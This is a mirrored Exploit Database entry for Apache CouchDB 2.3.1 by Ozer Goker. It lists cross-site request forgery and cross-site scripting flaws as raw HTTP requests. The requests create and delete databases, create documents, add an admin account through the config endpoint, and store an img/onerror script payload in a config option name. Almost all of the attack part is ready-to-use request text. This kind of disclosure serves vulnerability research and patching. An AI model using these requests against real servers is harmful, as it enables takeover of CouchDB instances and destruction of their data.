Apache CouchDB 2.3.1 – Cross-Site Request Forgery / Cross-Site Scripting

• Exploit Database
• 118 阅读

• 作者： Ozer Goker
  日期： 2019-03-25
• 类别：

  • webapps
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/46595/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165

  ################################################################################################################################## # Exploit Title: Apache CouchDB 2.3.1 | Cross-Site Request Forgery / Cross-Site Scripting # Date: 22.03.2019 # Exploit Author: Ozer Goker # Vendor Homepage: http://couchdb.apache.org # Software Link: http://couchdb.apache.org/#download # Version: 2.3.1 ##################################################################################################################################   Introduction   A CouchDB server hosts named databases, which store documents. Each document is uniquely named in the database, and CouchDB provides a RESTful HTTP API for reading and updating (add, edit, delete) database documents.   #################################################################################   Vulnerabilities: CSRF | XSS DOM Based & Reflected & Stored   #################################################################################   CSRF1   Create Database   PUT /test HTTP/1.1 Host: 127.0.0.1:5984 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://127.0.0.1:5984/_utils/ Content-Type: application/json X-Requested-With: XMLHttpRequest Content-Length: 27 DNT: 1 Connection: close Cookie: _ga=GA1.1.781615969.1550605249   {"id":"test","name":"test"}   #################################################################################   CSRF2   Delete Database   DELETE /test HTTP/1.1 Host: 127.0.0.1:5984 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0 Accept: application/json Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://127.0.0.1:5984/_utils/ content-type: application/json pragma: no-cache Origin: http://127.0.0.1:5984 DNT: 1 Connection: close Cookie: _ga=GA1.1.781615969.1550605249 Cache-Control: max-age=0     #################################################################################   CSRF3   Create Document   POST /test/ HTTP/1.1 Host: 127.0.0.1:5984 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://127.0.0.1:5984/_utils/ Content-Type: application/json X-Requested-With: XMLHttpRequest Content-Length: 18 DNT: 1 Connection: close Cookie: _ga=GA1.1.781615969.1550605249   {"testdoc":"test"}   #################################################################################   CSRF4   Create Admin   PUT /_node/couchdb@localhost/_config/admins/admin HTTP/1.1 Host: 127.0.0.1:5984 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0 Accept: application/json Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://127.0.0.1:5984/_utils/ content-type: application/json pragma: no-cache Origin: http://127.0.0.1:5984 Content-Length: 10 DNT: 1 Connection: close Cookie: _ga=GA1.1.781615969.1550605249 Cache-Control: max-age=0   "password"     #################################################################################     CSRF5 & XSS1 | DOM Based & Stored - Add Option     PUT /_node/couchdb@localhost/_config/test/%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E HTTP/1.1 Host: 127.0.0.1:5984 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0 Accept: application/json Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://127.0.0.1:5984/_utils/ content-type: application/json pragma: no-cache Origin: http://127.0.0.1:5984 Content-Length: 6 DNT: 1 Connection: close Cookie: _ga=GA1.1.781615969.1550605249 Cache-Control: max-age=0   "test"   #################################################################################   CSRF6 & XSS2 | DOM Based & Stored - Delete Option   DELETE /_node/couchdb@localhost/_config/test/%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E HTTP/1.1 Host: 127.0.0.1:5984 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0 Accept: application/json Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://127.0.0.1:5984/_utils/ content-type: application/json pragma: no-cache Origin: http://127.0.0.1:5984 DNT: 1 Connection: close Cookie: _ga=GA1.1.781615969.1550605249 Cache-Control: max-age=0     #################################################################################